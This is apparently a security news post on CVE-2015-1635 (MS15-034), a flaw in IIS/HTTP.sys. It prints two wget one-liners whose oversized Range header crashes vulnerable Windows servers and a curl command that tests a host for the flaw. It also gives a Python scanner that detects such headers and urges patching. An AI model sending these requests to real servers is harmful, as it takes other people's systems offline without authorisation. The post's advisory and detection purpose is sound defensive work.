The recently discovered vulnerability CVE-2015-1635 allows unauthorized users to carry out a remote code execution attack on vulnerable IIS servers and other Microsoft products.
Researcher Mattias Geniar has published a proof of concept that will BSoD a Windows web server if a request is sent with large byte offsets in the HTTP Range header, similar to the DoS attack on Apache from 2011 that caused 100% CPU usage.
Critically affected software:
- Windows 7 to 8.1
- Windows Server 2008 R2 – 2012 R2
Sending such a request can trigger a Blue Screen of Death, immediately rendering that machine offline:
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png
wget --header="Range: bytes=0-18446744073709551615" http://address/welcome.png
The curl command below shows hackers whether an IIS server is vulnerable to the attack or not:
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
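Every request shown above carries a Range header whose end offset is 18446744073709551615 (2^64 - 1), which no real file offset reaches. The following Python is an added example, not code from the original post or from Microsoft: it parses Range headers from captured request headers and flags implausibly large or malformed byte ranges. The 1 TiB threshold, the function names and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumption: no resource on the monitored servers is larger than 1 TiB, so any
# byte offset above this cannot belong to a legitimate range request.
MAX_PLAUSIBLE_OFFSET = 2**40

_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_range(value):
    """Parse a Range header value into [(start, end), ...]; None marks an omitted
    side. Returns None when the value is not a well-formed 'bytes=' range set."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = _SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            return None
        ranges.append(tuple(int(g) if g else None for g in m.groups()))
    return ranges

def classify(value):
    """Return 'ok', 'malformed' or 'suspicious' for one Range header value."""
    ranges = parse_range(value)
    if ranges is None:
        return "malformed"
    offsets = [n for pair in ranges for n in pair if n is not None]
    return "suspicious" if max(offsets) > MAX_PLAUSIBLE_OFFSET else "ok"

def scan(requests):
    """requests: (client, raw header block) pairs. Returns (client, value, verdict) hits."""
    hits = []
    for client, raw in requests:
        for line in raw.splitlines():
            name, _, value = line.partition(":")
            if name.strip().lower() == "range" and classify(value.strip()) != "ok":
                hits.append((client, value.strip(), classify(value.strip())))
    return hits

# Constructed sample requests (documentation addresses, not real traffic).
SAMPLE = [
    ("192.0.2.10", "GET /welcome.png HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-18446744073709551615"),
    ("192.0.2.11", "GET /video.mp4 HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-1023, 2048-"),
    ("192.0.2.12", "GET /iis-85.png HTTP/1.1\r\nHost: example.test\r\nrange: bytes=18-18446744073709551615"),
    ("192.0.2.13", "GET / HTTP/1.1\r\nHost: example.test\r\nRange: bytes=abc-"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same check can run in a reverse proxy or log pipeline in front of unpatched hosts, provided the Range header is actually being captured there.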
An Nmap NSE script to detect MS15-034 on the HTTP port is available here.
Exploits have been crafted and are in the wild, open to everyone with internet access, so we strongly suggest that you test your servers and apply the latest updates to prevent the nightmares this might cause you. Microsoft has already published documentation on this: MS15-034.